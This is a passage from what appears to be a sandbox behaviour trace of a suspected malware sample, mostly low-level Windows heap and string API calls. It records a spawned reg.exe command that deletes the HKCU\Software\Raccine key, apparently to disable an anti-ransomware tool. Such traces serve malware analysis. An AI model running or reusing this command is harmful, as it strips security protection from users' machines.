[0081.703] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4a4b18) returned 1 [0081.703] GetProcessHeap () returned 0x490000 [0081.703] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a4b18) returned 0x14 [0081.703] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a4b18 | out: hHeap=0x490000) returned 1 [0081.703] GetProcessHeap () returned 0x490000 [0081.703] GetProcessHeap () returned 0x490000 [0081.703] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4a5650) returned 1 [0081.703] GetProcessHeap () returned 0x490000 [0081.703] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a5650) returned 0x50 [0081.704] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a5650 | out: hHeap=0x490000) returned 1 [0081.704] GetProcessHeap () returned 0x490000 [0081.704] GetProcessHeap () returned 0x490000 [0081.704] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4a4b38) returned 1 [0081.704] GetProcessHeap () returned 0x490000 [0081.704] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a4b38) returned 0x14 [0081.704] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a4b38 | out: hHeap=0x490000) returned 1 [0081.704] GetProcessHeap () returned 0x490000 [0081.704] GetProcessHeap () returned 0x490000 [0081.704] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4a4cd0) returned 1 [0081.704] GetProcessHeap () returned 0x490000 [0081.704] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a4cd0) returned 0x14 [0081.704] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a4cd0 | out: hHeap=0x490000) returned 1 [0081.704] GetProcessHeap () returned 0x490000 [0081.704] GetProcessHeap () returned 0x490000 [0081.704] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4a4cf0) returned 1 [0081.704] GetProcessHeap () returned 0x490000 [0081.704] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a4cf0) returned 0x14 [0081.704] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a4cf0 | out: hHeap=0x490000) returned 1 [0081.704] GetProcessHeap () returned 0x490000 [0081.704] GetProcessHeap () returned 0x490000 [0081.704] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x49ef78) returned 1 [0081.704] GetProcessHeap () returned 0x490000 [0081.704] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x49ef78) returned 0xe [0081.704] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x49ef78 | out: hHeap=0x490000) returned 1 [0081.704] GetProcessHeap () returned 0x490000 [0081.704] GetProcessHeap () returned 0x490000 [0081.704] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4a4d10) returned 1 [0081.704] GetProcessHeap () returned 0x490000 [0081.704] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a4d10) returned 0x14 [0081.704] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a4d10 | out: hHeap=0x490000) returned 1 [0081.704] GetProcessHeap () returned 0x490000 [0081.704] GetProcessHeap () returned 0x490000 [0081.704] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x49eed0) returned 1 [0081.704] GetProcessHeap () returned 0x490000 [0081.704] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x49eed0) returned 0x10 [0081.704] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x49eed0 | out: hHeap=0x490000) returned 1 [0081.704] GetProcessHeap () returned 0x490000 [0081.705] GetProcessHeap () returned 0x490000 [0081.705] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4a4b58) returned 1 [0081.705] GetProcessHeap () returned 0x490000 [0081.705] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a4b58) returned 0x14 [0081.705] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a4b58 | out: hHeap=0x490000) returned 1 [0081.705] GetProcessHeap () returned 0x490000 [0081.705] GetProcessHeap () returned 0x490000 [0081.705] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4a4b78) returned 1 [0081.705] GetProcessHeap () returned 0x490000 [0081.705] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a4b78) returned 0x14 [0081.705] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a4b78 | out: hHeap=0x490000) returned 1 [0081.705] GetProcessHeap () returned 0x490000 [0081.705] GetProcessHeap () returned 0x490000 [0081.705] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4a4b98) returned 1 [0081.705] GetProcessHeap () returned 0x490000 [0081.705] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a4b98) returned 0x14 [0081.705] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a4b98 | out: hHeap=0x490000) returned 1 [0081.705] GetProcessHeap () returned 0x490000 [0081.705] GetProcessHeap () returned 0x490000 [0081.705] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4a4bb8) returned 1 [0081.705] GetProcessHeap () returned 0x490000 [0081.705] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a4bb8) returned 0x14 [0081.705] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a4bb8 | out: hHeap=0x490000) returned 1 [0081.705] GetProcessHeap () returned 0x490000 [0081.705] GetProcessHeap () returned 0x490000 [0081.705] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x49eee8) returned 1 [0081.705] GetProcessHeap () returned 0x490000 [0081.705] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x49eee8) returned 0x10 [0081.705] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x49eee8 | out: hHeap=0x490000) returned 1 [0081.705] GetProcessHeap () returned 0x490000 [0081.705] GetProcessHeap () returned 0x490000 [0081.705] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4a4bd8) returned 1 [0081.705] GetProcessHeap () returned 0x490000 [0081.705] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a4bd8) returned 0x14 [0081.705] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a4bd8 | out: hHeap=0x490000) returned 1 [0081.705] GetProcessHeap () returned 0x490000 [0081.705] GetProcessHeap () returned 0x490000 [0081.705] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4a4c38) returned 1 [0081.706] GetProcessHeap () returned 0x490000 [0081.706] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a4c38) returned 0x14 [0081.706] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a4c38 | out: hHeap=0x490000) returned 1 [0081.706] GetProcessHeap () returned 0x490000 [0081.706] GetProcessHeap () returned 0x490000 [0081.706] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x49ef00) returned 1 [0081.706] GetProcessHeap () returned 0x490000 [0081.706] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x49ef00) returned 0x10 [0081.706] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x49ef00 | out: hHeap=0x490000) returned 1 [0081.706] GetProcessHeap () returned 0x490000 [0081.706] GetProcessHeap () returned 0x490000 [0081.706] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x4a4c70) returned 1 [0081.706] GetProcessHeap () returned 0x490000 [0081.706] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x4a4c70) returned 0x14 [0081.706] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a4c70 | out: hHeap=0x490000) returned 1 [0081.706] GetProcessHeap () returned 0x490000 [0081.706] GetProcessHeap () returned 0x490000 [0081.706] HeapValidate (hHeap=0x490000, dwFlags=0x0, lpMem=0x49eeb8) returned 1 [0081.706] GetProcessHeap () returned 0x490000 [0081.706] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x49eeb8) returned 0x10 [0081.706] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x49eeb8 | out: hHeap=0x490000) returned 1 [0081.706] exit (_Code=1) Process: id = "7" image_name = "reg.exe" filename = "c:\\windows\\syswow64\\reg.exe" page_root = "0x1fcf000" os_pid = "0x904" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"reg\" delete HKCU\\Software\\Raccine /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 79 os_tid = 0x914 [0081.597] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x23fa9c | out: lpSystemTimeAsFileTime=0x23fa9c*(dwLowDateTime=0xbb7db30, dwHighDateTime=0x1d6f0d1)) [0081.597] GetCurrentProcessId () returned 0x904 [0081.597] GetCurrentThreadId () returned 0x914 [0081.597] GetTickCount () returned 0x114ae88 [0081.597] QueryPerformanceCounter (in: lpPerformanceCount=0x23fa94 | out: lpPerformanceCount=0x23fa94*=20069781674) returned 1 [0081.599] GetModuleHandleA (lpModuleName=0x0) returned 0xf90000 [0081.599] __set_app_type (_Type=0x1) [0081.599] __p__fmode () returned 0x770331f4 [0081.599] __p__commode () returned 0x770331fc [0081.599] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf9d4f9) returned 0x0 [0081.599] __wgetmainargs (in: _Argc=0xf9f030, _Argv=0xf9f038, _Env=0xf9f034, _DoWildCard=0, _StartInfo=0xf9f010 | out: _Argc=0xf9f030, _Argv=0xf9f038, _Env=0xf9f034) returned 0 [0081.599] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="delete", cchCount1=-1, lpString2="QUERY", cchCount2=-1) returned 1 [0081.600] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="delete", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 3 [0081.600] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="delete", cchCount1=-1, lpString2="DELETE", cchCount2=-1) returned 2 [0081.600] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", phkResult=0x23fa1c | out: phkResult=0x23fa1c*=0x0) returned 0x2 [0081.601] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="delete", cchCount1=-1, lpString2="DELETE", cchCount2=-1) returned 2 [0081.601] lstrlenW (lpString="-?|/?|-h|/h") returned 11 [0081.601] GetProcessHeap () returned 0x3e0000 [0081.601] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x10) returned 0x3eee20 [0081.601] lstrlenW (lpString="") returned 0 [0081.601] GetProcessHeap () returned 0x3e0000 [0081.601] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x2) returned 0x3f3738 [0081.601] GetProcessHeap () returned 0x3e0000 [0081.601] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x14) returned 0x3f3748 [0081.601] GetProcessHeap () returned 0x3e0000 [0081.601] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x10) returned 0x3eee38 [0081.601] GetProcessHeap () returned 0x3e0000 [0081.601] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x14) returned 0x3f3768 [0081.601] GetProcessHeap () returned 0x3e0000 [0081.601] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x14) returned 0x3f4a78 [0081.601] GetProcessHeap () returned 0x3e0000 [0081.601] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x14) returned 0x3f4a98 [0081.601] GetProcessHeap () returned 0x3e0000 [0081.601] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x14) returned 0x3f4ab8 [0081.601] GetProcessHeap () returned 0x3e0000 [0081.601] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x10) returned 0x3eee50 [0081.601] GetProcessHeap () returned 0x3e0000 [0081.601] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x14) returned 0x3f4ad8 [0081.601] GetProcessHeap () returned 0x3e0000 [0081.601] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x14) returned 0x3f4af8 [0081.601] GetProcessHeap () returned 0x3e0000 [0081.601] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x14) returned 0x3f4b18 [0081.601] GetProcessHeap () returned 0x3e0000 [0081.601] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x14) returned 0x3f4b38 [0081.601] GetProcessHeap () returned 0x3e0000 [0081.601] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x10) returned 0x3eee68 [0081.601] GetProcessHeap () returned 0x3e0000 [0081.602] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x14) returned 0x3f4b58 [0081.602] GetProcessHeap () returned 0x3e0000 [0081.602] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x14) returned 0x3f4b78 [0081.602] GetProcessHeap () returned 0x3e0000 [0081.602] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x14) returned 0x3f4b98 [0081.602] GetProcessHeap () returned 0x3e0000 [0081.602] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x14) returned 0x3f4bd0 [0081.602] SetThreadUILanguage (LangId=0x0) returned 0x409 [0081.602] GetProcessHeap () returned 0x3e0000 [0081.602] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x10) returned 0x3eee80 [0081.602] _memicmp (_Buf1=0x3eee80, _Buf2=0xf91318, _Size=0x7) returned 0 [0081.602] GetProcessHeap () returned 0x3e0000 [0081.602] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x1e) returned 0x3f3c38 [0081.602] lstrlenW (lpString="HKCU\\Software\\Raccine") returned 21 [0081.602] GetProcessHeap () returned 0x3e0000 [0081.602] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x10) returned 0x3eee98 [0081.602] _memicmp (_Buf1=0x3eee98, _Buf2=0xf91318, _Size=0x7) returned 0 [0081.602] GetProcessHeap () returned 0x3e0000 [0081.602] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x32) returned 0x3f53b8 [0081.602] _vsnwprintf (in: _Buffer=0x3f3c38, _BufferCount=0xe, _Format="|%s|", _ArgList=0x23f974 | out: _Buffer="|-?|/?|-h|/h|") returned 13 [0081.602] _vsnwprintf (in: _Buffer=0x3f53b8, _BufferCount=0x18, _Format="|%s|", _ArgList=0x23f974 | out: _Buffer="|HKCU\\Software\\Raccine|") returned 23 [0081.602] lstrlenW (lpString="|-?|/?|-h|/h|") returned 13 [0081.602] lstrlenW (lpString="|HKCU\\Software\\Raccine|") returned 23 [0081.602] SetLastError (dwErrCode=0x490) [0081.602] lstrlenW (lpString="HKCU\\Software\\Raccine") returned 21 [0081.602] GetProcessHeap () returned 0x3e0000 [0081.602] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x2c) returned 0x3f5538 [0081.602] lstrlenW (lpString="HKCU\\Software\\Raccine") returned 21 [0081.602] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0081.602] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0081.603] StrChrW (lpStart=" \x09", wMatch=0x4b) returned 0x0 [0081.603] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0081.603] StrChrW (lpStart=" \x09", wMatch=0x55) returned 0x0 [0081.603] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0081.603] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0081.603] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0081.603] StrChrW (lpStart=" \x09", wMatch=0x66) returned 0x0 [0081.603] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0081.603] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 [0081.603] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0081.603] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0081.603] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0081.603] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0081.603] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0081.603] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0081.603] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0081.603] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0081.603] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0081.603] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0081.603] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0081.603] lstrlenW (lpString="HKCU\\Software\\Raccine") returned 21 [0081.603] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKCU\\Software\\Raccine", cchCount1=2, lpString2="\\\\", cchCount2=2) returned 3 [0081.603] lstrlenW (lpString="HKCU\\Software\\Raccine") returned 21 [0081.603] lstrlenW (lpString="HKCU\\Software\\Raccine") returned 21 [0081.603] StrChrIW (lpStart="HKCU\\Software\\Raccine", wMatch=0x5c) returned="\\Software\\Raccine" [0081.604] lstrlenW (lpString="HKEY_CURRENT_CONFIG") returned 19 [0081.604] GetProcessHeap () returned 0x3e0000 [0081.604] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x28) returned 0x3f56d0 [0081.604] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKCU", cchCount1=-1, lpString2="HKCU", cchCount2=-1) returned 2 [0081.604] lstrlenW (lpString="Software\\Raccine") returned 16 [0081.604] lstrlenW (lpString="Software\\Raccine") returned 16 [0081.604] lstrlenW (lpString="Software\\Raccine") returned 16 [0081.604] StrChrIW (lpStart="Software\\Raccine", wMatch=0x5c) returned="\\Raccine" [0081.604] lstrlenW (lpString="Software\\Raccine") returned 16 [0081.604] StrChrIW (lpStart="Raccine", wMatch=0x5c) returned 0x0 [0081.604] SetLastError (dwErrCode=0x490) [0081.604] lstrlenW (lpString="Software\\Raccine") returned 16 [0081.604] SetLastError (dwErrCode=0x0) [0081.604] lstrlenW (lpString="Software\\Raccine") returned 16 [0081.604] GetProcessHeap () returned 0x3e0000 [0081.604] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x22) returned 0x3f5700 [0081.604] GetProcessHeap () returned 0x3e0000 [0081.604] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x4e) returned 0x3f5730 [0081.604] GetProcessHeap () returned 0x3e0000 [0081.604] GetProcessHeap () returned 0x3e0000 [0081.604] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f56d0) returned 1 [0081.604] GetProcessHeap () returned 0x3e0000 [0081.604] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f56d0) returned 0x28 [0081.604] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f56d0 | out: hHeap=0x3e0000) returned 1 [0081.604] GetProcessHeap () returned 0x3e0000 [0081.604] GetProcessHeap () returned 0x3e0000 [0081.604] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5538) returned 1 [0081.604] GetProcessHeap () returned 0x3e0000 [0081.604] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f5538) returned 0x2c [0081.604] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5538 | out: hHeap=0x3e0000) returned 1 [0081.605] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/F", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0081.605] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/F", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0081.605] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/F", cchCount1=-1, lpString2="/va", cchCount2=-1) returned 1 [0081.605] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/F", cchCount1=-1, lpString2="/f", cchCount2=-1) returned 2 [0081.605] SetLastError (dwErrCode=0x0) [0081.605] GetProcessHeap () returned 0x3e0000 [0081.605] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x14) returned 0x3f4bf0 [0081.605] GetProcessHeap () returned 0x3e0000 [0081.605] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x14) returned 0x3f4c10 [0081.605] GetProcessHeap () returned 0x3e0000 [0081.605] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x10) returned 0x3eeeb0 [0081.605] _memicmp (_Buf1=0x3eeeb0, _Buf2=0xf91318, _Size=0x7) returned 0 [0081.605] GetProcessHeap () returned 0x3e0000 [0081.605] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x200) returned 0x3f5788 [0081.605] LoadStringW (in: hInstance=0x0, uID=0xc9, lpBuffer=0x3f5788, cchBufferMax=256 | out: lpBuffer="Permanently delete the registry key %s (Yes/No)? ") returned 0x31 [0081.605] lstrlenW (lpString="Permanently delete the registry key %s (Yes/No)? ") returned 49 [0081.605] GetProcessHeap () returned 0x3e0000 [0081.605] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x64) returned 0x3f5990 [0081.605] _memicmp (_Buf1=0x3eeeb0, _Buf2=0xf91318, _Size=0x7) returned 0 [0081.605] LoadStringW (in: hInstance=0x0, uID=0xce, lpBuffer=0x3f5788, cchBufferMax=256 | out: lpBuffer="YNA") returned 0x3 [0081.605] lstrlenW (lpString="YNA") returned 3 [0081.605] GetProcessHeap () returned 0x3e0000 [0081.605] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x8) returned 0x3f53f8 [0081.605] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Raccine", ulOptions=0x0, samDesired=0xf003f, phkResult=0x23f9b0 | out: phkResult=0x23f9b0*=0x0) returned 0x2 [0081.606] _memicmp (_Buf1=0x3eeeb0, _Buf2=0xf91318, _Size=0x7) returned 0 [0081.606] LoadStringW (in: hInstance=0x0, uID=0xbf, lpBuffer=0x3f5788, cchBufferMax=256 | out: lpBuffer="The system was unable to find the specified registry key or value.\n") returned 0x43 [0081.606] lstrlenW (lpString="The system was unable to find the specified registry key or value.\n") returned 67 [0081.606] GetProcessHeap () returned 0x3e0000 [0081.606] GetProcessHeap () returned 0x3e0000 [0081.606] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5990) returned 1 [0081.606] GetProcessHeap () returned 0x3e0000 [0081.606] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f5990) returned 0x64 [0081.606] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5990 | out: hHeap=0x3e0000) returned 1 [0081.606] GetProcessHeap () returned 0x3e0000 [0081.606] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x88) returned 0x3f5990 [0081.606] GetLastError () returned 0x0 [0081.606] lstrlenW (lpString="The system was unable to find the specified registry key or value.\n") returned 67 [0081.606] GetProcessHeap () returned 0x3e0000 [0081.606] GetProcessHeap () returned 0x3e0000 [0081.606] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3738) returned 1 [0081.606] GetProcessHeap () returned 0x3e0000 [0081.606] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f3738) returned 0x2 [0081.606] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3738 | out: hHeap=0x3e0000) returned 1 [0081.606] GetProcessHeap () returned 0x3e0000 [0081.606] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x88) returned 0x3f5a20 [0081.606] SetLastError (dwErrCode=0x0) [0081.606] __iob_func () returned 0x77032900 [0081.606] GetProcessHeap () returned 0x3e0000 [0081.606] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x14) returned 0x3f4c30 [0081.606] GetProcessHeap () returned 0x3e0000 [0081.606] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x14) returned 0x3f4c50 [0081.606] GetProcessHeap () returned 0x3e0000 [0081.606] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x14) returned 0x3f4c70 [0081.606] _memicmp (_Buf1=0x3eeeb0, _Buf2=0xf91318, _Size=0x7) returned 0 [0081.606] LoadStringW (in: hInstance=0x0, uID=0x1389, lpBuffer=0x3f5788, cchBufferMax=256 | out: lpBuffer="ERROR:") returned 0x6 [0081.607] lstrlenW (lpString="ERROR:") returned 6 [0081.607] GetProcessHeap () returned 0x3e0000 [0081.607] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0xe) returned 0x3eeec8 [0081.607] GetProcessHeap () returned 0x3e0000 [0081.607] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x10) returned 0x3eeee0 [0081.607] _memicmp (_Buf1=0x3eeee0, _Buf2=0xf91318, _Size=0x7) returned 0 [0081.607] GetProcessHeap () returned 0x3e0000 [0081.607] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0xc, Size=0x1000) returned 0x3f5ab0 [0081.607] _vsnwprintf (in: _Buffer=0x3f5ab0, _BufferCount=0x7ff, _Format="%s ", _ArgList=0x23f96c | out: _Buffer="ERROR: ") returned 7 [0081.607] _fileno (_File=0x77032940) returned -2 [0081.607] _errno () returned 0x6807d8 [0081.607] _get_osfhandle (_FileHandle=-2) returned 0xffffffff [0081.611] SetLastError (dwErrCode=0x6) [0081.611] lstrlenW (lpString="ERROR: ") returned 7 [0081.611] GetConsoleOutputCP () returned 0x1b5 [0081.611] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="ERROR: ", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0081.611] GetConsoleOutputCP () returned 0x1b5 [0081.612] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="ERROR: ", cchWideChar=7, lpMultiByteStr=0xf9f360, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ERROR: ", lpUsedDefaultChar=0x0) returned 7 [0081.612] fprintf (in: _File=0x77032940, _Format="%s" | out: _File=0x77032940) returned 7 [0081.612] fflush (in: _File=0x77032940 | out: _File=0x77032940) returned -1 [0081.612] _fileno (_File=0x77032940) returned -2 [0081.612] _errno () returned 0x6807d8 [0081.612] _get_osfhandle (_FileHandle=-2) returned 0xffffffff [0081.612] SetLastError (dwErrCode=0x6) [0081.612] lstrlenW (lpString="The system was unable to find the specified registry key or value.\n") returned 67 [0081.612] GetConsoleOutputCP () returned 0x1b5 [0081.612] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="The system was unable to find the specified registry key or value.\n", cchWideChar=67, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 67 [0081.612] GetConsoleOutputCP () returned 0x1b5 [0081.612] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="The system was unable to find the specified registry key or value.\n", cchWideChar=67, lpMultiByteStr=0xf9f360, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The system was unable to find the specified registry key or value.\n", lpUsedDefaultChar=0x0) returned 67 [0081.612] fprintf (in: _File=0x77032940, _Format="%s" | out: _File=0x77032940) returned 67 [0081.612] fflush (in: _File=0x77032940 | out: _File=0x77032940) returned -1 [0081.612] GetProcessHeap () returned 0x3e0000 [0081.612] GetProcessHeap () returned 0x3e0000 [0081.612] HeapValidate (hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f5700) returned 1 [0081.612] GetProcessHeap () returned 0x3e0000 [0081.612] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f5700) returned 0x22 [0081.612] HeapFree (in: 